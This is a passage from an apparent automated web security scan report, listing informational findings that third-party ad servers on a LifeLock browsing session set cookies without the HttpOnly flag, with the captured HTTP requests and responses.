u8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUSEtGmJ_d6tEMmF6Ld72CP1yPoOsDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357ZZkvA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAF6CFI

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUelvbcSQnrAxyasYlpB02IBM3QRUDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357ZZkvA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpDNiNPOOpNlQHkG380ZDAwcQIfsZAQqZgi8xcgEpBgMwDwFMzC1tAAsyJLJyAqUYwlhYmVkAzLkdzEysIHdX2eyAmQWAwMAIV8oiw--; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:31:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&sig=AGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A&client=ca-pub-6888065668292638&adurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Content-Length: 0
Date: Sun, 24 Apr 2011 12:31:25 GMT


14.18. http://ad.doubleclick.net/adj/inet.hostcat/_default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/inet.hostcat/_default

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/inet.hostcat/_default;sz=300x250;ord=9266033005085678? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 343
Set-Cookie: id=c4d9990360000f2||t=1303646982|et=730|cs=mtzrl3ts; path=/; domain=.doubleclick.net; expires=Tue, 23 Apr 2013 12:09:42 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 23 Apr 2011 12:09:42 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 12:09:42 GMT
Expires: Sun, 24 Apr 2011 12:09:42 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af3/0/0/%2a/j;233907841;0-0;0;20874861;4307-300/250;22858237/22876120/1;;~sscs=%3fhttp://hostvoice.com/affordable-budget-
...[SNIP]...

14.19. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1021183&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; lifb=o1s9XS8(?nv?!8H; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!!v!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!#<wb#h!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!$<wb#g!!L[f!!!!#<wYl+!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#5[N!!!!#<vl)_!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#UDP!!!!)<wYiT!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#q),!!!!#<wO:5!#q2T!!!!$<wb#g!#q2U!!!!$<wb#g!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$#WA!!!!$<w[_`!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:08:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!w!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!#<wb#h!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!$<wb#g!!L[f!!!!#<wYl+!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#5[N!!!!#<vl)_!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#UDP!!!!)<wYiT!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!#<wb)?!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#q),!!!!#<wO:5!#q2T!!!!$<wb#g!#q2U!!!!$<wb#g!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$#WA!!!!$<w[_`!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1033198129/?label=ddVgCJ3Y4wEQsbTV7AM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Sun, 24 Apr 2011 03:08:32 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


14.20. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/leadership/management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hifjv2rR/V4c+8rGrfYpD4E7DYk/sDOMiD26ze9j90z9N83XdjZt9ZtbR0ijMugza0Qe5pDvWTr6P4O2VQdjPWf6987WWc8u5KEGwpBscqKQZ1BB2LCvdm6n578p4Rvu6q0mDJHnkT/2jbqILCYLacH0wg0BO/PRs5ivndkckUxb3rhBm6zdK7VzeQeU44tgNRzskkGjN35lToNd85zTK6Vj+9BBbxpbelASsgX6/CR8Y5xVC8aI0ZxOO9+xP1LJ2VtAHTZTiV00au+sbBtvKMxT926tMzK0H5cwsw+g/cYgBE0rDkLsCjUxh6FLjC7i6EMGwHUbcgJhoCDKlItJyK8FU8pMQoukW4Ksl1ZOpqZ7GC0HHNVqD6t3U32r9sbTyZkKK+QA8JjzMDrdR4tTUP2OU1HeXuSVxv1yl+5/L2aqQXy3rE21OIbAG0Txff9Q6+QE4SRR2rr8yhSPM8aOTW2BlGO/zv4pDbki5ENYG1rAwHxPcsScK1CIu7nP426FZdWFs4e21wjcqJyCbd5JPJ40ccpki7u1RrKAV+CG6LFFkj53H1SCrbYfOIRrLfH5rh4eL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2h2r6MHc5Pzt36KPxeMWOL5008JyU50uBQkV+DdYK4Gk+NchyAu4bzHS5mv/nQZXciumcSgzF8+UUvGNyoCfGNhSTai5t86Aacd0zjGzqDaj+g6z+b8nem9ZIkW8qaa0CMbJFNkcqd6zbZHfm4bwKc4OXmjNFwXw/aqQPgXGZdNiAABShzNlnnILNvQI/L4iLNmM8NLZISUdj8Bywe/xU4CPbov0NZunyZnU87RNKIJ8ju6qLTygwGnjEmKh4STE2cZsDOvcNSCTjfRSj9TWHSYPlOxGSR3K91I2CEvVf/GjySVjhJlm3bhym+JGHVNPjKwzs0PgWWBuKLIQBlJoyq1iJREoGQ2gRM+eiMu3rkpU9zbDFvwNQMS8je4aRvBwY="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYU1E2EPnsIIDz/BtZLv2rR/V4c7O6C3v7m/kxmFYk/sE+g72Wvze9j97z84DKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9svj69842Hfo95KEGQpbMeW+0NaNhmBYTXTkRQKS1XMUccblUZCb8d1ioTrWzOZ45+knAG4/fSC2XVCuSI3SfynIhw/0lJepQCzIltDUGLYzLUkLv/MFxI8xXEt5FPdByafvFHnwcc+g50hOTbL+g7n64N54Np8vbYE35aYyaJiGjpBaC12VhkZlzFtMxirRDAwPWID4NdT8+H1n+vIDBsAcC4v6vpxRHAQWP/wFECr4Zl33i7snI0unkbnfWDKcc2lBdCDsvleyPGu7IGOFhOgsC4wPBBfAj1GcROo+BilbXokC4Pz9vadLAfzLPlIdm0h4ILB9XSlyVc4b6FJRKQ8GSIuCUsCUIuhiY7qOe4dxMbmgcF8Z5vsbPVtNU5unXYkl1MhFPAXo6dObcC7t2Mp4lHB3smqaDjmSWTHYhcyvCsdckm7oUK5b0m3OWakUES9n6/gVIYIYYx4Q8OEV/NJVzUMJ3P0YTcfNkdzUeqj3w7I6vhwmxCxO1HK1RTc4UB35R4M3XJY0QrizGyoGlm9y6oPqyNcDNzYKTvC6oJGklEo2V4PXXhd5rDMHIhx2MXWu4IK+b30e7OfPWDWKlQbvGkOch0VHJWX9SvL5QvXWojkDL40JInzmAVr4XQyDFi7ty6xaQdTP7HzqDar+jK2lgMToKlZIkWUobdESNbO5VUYuF6zbZ/f7YfwXtEOZYHnlawNXis8+0xTL3web3W3GLT/ZTAh4qtrkjAQnd3V8EdMPIYePwpRv8DD3B2L4a6XH5lygIq/vjuHhcNjMMUQ+X+fLAOHHNWjDM+52IKUhADIXMSqGCsUEAyiBu5V+I6rJBxrv9bh4sTdGrxy8QWKFJQU2vB09tMV34No6/mhl+STAB+L7fmkFhELkBHvTZutKd7KYQ1aPWbdRmJfIrHLhmsKllabrGbl63"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:42 GMT


14.21. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; 